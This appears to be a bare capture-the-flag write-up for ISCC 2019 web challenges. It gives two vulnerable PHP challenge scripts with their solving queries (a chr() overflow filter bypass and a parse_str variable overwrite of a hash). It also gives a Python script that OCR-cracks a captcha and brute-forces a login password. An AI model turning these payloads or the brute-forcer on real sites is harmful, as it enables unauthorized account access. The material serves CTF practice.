brew install tesseract pip install PILLOW pip install pytesseract 

<?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = '';  for ($i = 0; $i < count($value); ++$i) {     if ($value[$i] > 32 && $value[$i] < 127) unset($value);     else $username .= chr($value[$i]);     if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {         echo 'Hello '.$username.'!', '<br>', PHP_EOL;         echo $flag, '<hr>';     } }  highlight_file(__FILE__); 

value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304 &value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=329 &value[12]=339&value[13]=323&value[14]=323&value[15]=306&value[16]=304&value[17]=305&value[18]=313&password=0x2333 

<?php  error_reporting(0);  include("flag.php");  $hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';  $parsed = parse_url($_SERVER['REQUEST_URI']);  if(isset($parsed["query"])){      $query = $parsed["query"];      $parsed_query = parse_str($query);      if($parsed_query!=NULL){          $action = $parsed_query['action'];      }       if($action==="auth"){          $key = $_GET["key"];          $hashed_input = hash('sha256', $key);          if($hashed_input!==$hashed_key){              die("<img src='cxk.jpg'>");          }           echo $flag;      }  }else{      show_source(__FILE__);  }?> 

action=auth&hashed_key=688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6&key=asd 

# -*- coding:utf-8 -*- from PIL import Image import pytesseract, requests  # 图片下载链接 image_url = 'http://url/vcode.php' # 图片保存路径 image_path = './1.png' # submit url_index="http://url/login.php"  header={     'Cookie': 'PHPSESSID=7it7m3kjj4hvrjmrbkluo3p507' }   def image_download():     """     图片下载     """     response = requests.post(image_url,headers=header)     with open(image_path, 'wb') as f:         f.write(response.content)  def get_image():     """     用Image获取图片文件     :return: 图片文件     """     image = Image.open(image_path)     return image  def image_grayscale_deal(image):     """     图片转灰度处理     :param image:图片文件     :return: 转灰度处理后的图片文件     """     image = image.convert('L')     #取消注释后可以看到处理后的图片效果     #image.show()     return image  def image_thresholding_method(image):     """     图片二值化处理     :param image:转灰度处理后的图片文件     :return: 二值化处理后的图片文件     """     # 阈值     threshold = 160     table = []     for i in range(256):         if i < threshold:             table.append(0)         else:             table.append(1)     # 图片二值化，此处第二个参数为数字一     image = image.point(table, '1')     #取消注释后可以看到处理后的图片效果     #image.show()     return image   def captcha_tesserocr_crack(image):     """     图像识别     :param image: 二值化处理后的图片文件     :return: 识别结果     """     result = pytesseract.image_to_string(image)     return result   if __name__ == '__main__':     image_download()     image = get_image()     img1 = image_grayscale_deal(image)     img2 = image_thresholding_method(img1)     text = captcha_tesserocr_crack(img2)[0:4].replace('O','0').replace('o','0').replace('l','1')     for i in range(999):         payload={'pwd':str(i).zfill(3),'user_code':str(text)}         ra=requests.post(url=url_index,data=payload,headers=header)         print payload,ra.content         while '验证码' in ra.content:             image_download()             image = get_image()             img1 = image_grayscale_deal(image)             img2 = image_thresholding_method(img1)             text = captcha_tesserocr_crack(img2)[0:4].replace('O','0').replace('o','0').replace('l','1')             payload={'pwd':str(i).zfill(3),'user_code':text}             ra=requests.post(url=url_index,data=payload,headers=header)             print payload,ra.content         else:             print payload,ra.content